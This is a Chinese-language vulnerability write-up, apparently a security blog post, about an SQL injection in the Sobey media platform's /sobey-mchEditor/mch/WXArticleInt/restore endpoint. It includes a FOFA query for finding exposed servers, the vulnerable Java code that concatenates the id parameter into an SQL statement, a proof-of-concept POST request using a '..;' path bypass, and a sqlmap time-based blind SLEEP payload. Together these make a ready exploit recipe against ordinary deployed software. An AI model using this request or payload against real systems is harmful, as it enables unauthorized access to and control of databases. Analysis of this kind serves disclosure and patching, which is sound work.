索贝融媒体 /sobey-mchEditor/mch/WXArticleInt/restore SQL注入漏洞


漏洞简介

索贝产品中的 /sobey-mchEditor/mch/WXArticleInt/restore 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制。

影响版本

fofa语法

icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"

漏洞分析

根据漏洞信息看下mch/WXArticleInt/restore的实现逻辑

@RequestMapping(
    value = {"/restore"},
    method = {RequestMethod.POST}
)
public Response restore(@RequestParam("token") String token, @RequestParam("siteCode") String siteCode, @RequestParam("id") String id) {
    Response response = new Response();
    response.setStatus(200);
    JSONObject userinfo = (JSONObject)this.req.getAttribute("userinfo");

    try {
        QueryBuilder qb = new QueryBuilder("update zcnwxarticle SET ifval='1' where id in (" + id + ")");
        qb.executeNoQuery();

代码一看就很明了了,id是被直接拼接在in子语句中,从而造成了SQL注入漏洞。

漏洞复现

POST /sobey-mchEditor/js/..;/mch/WXArticleInt/restore HTTP/1.1
Host: sobey.mrxn.net
Content-Type: application/x-www-form-urlencoded

siteCode=&id=SQLI_POC&token=

成功延时 5 秒

sqlmap结果如下

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: siteCode=&id=1 AND (SELECT 2804 FROM (SELECT(SLEEP(5)))MDfc)&token=
---

手机扫码阅读

用友NC content、portalpage 多个XML实体注入(XXE)漏洞

用友NC mtapptimeline/doApply SQL注入漏洞

评 论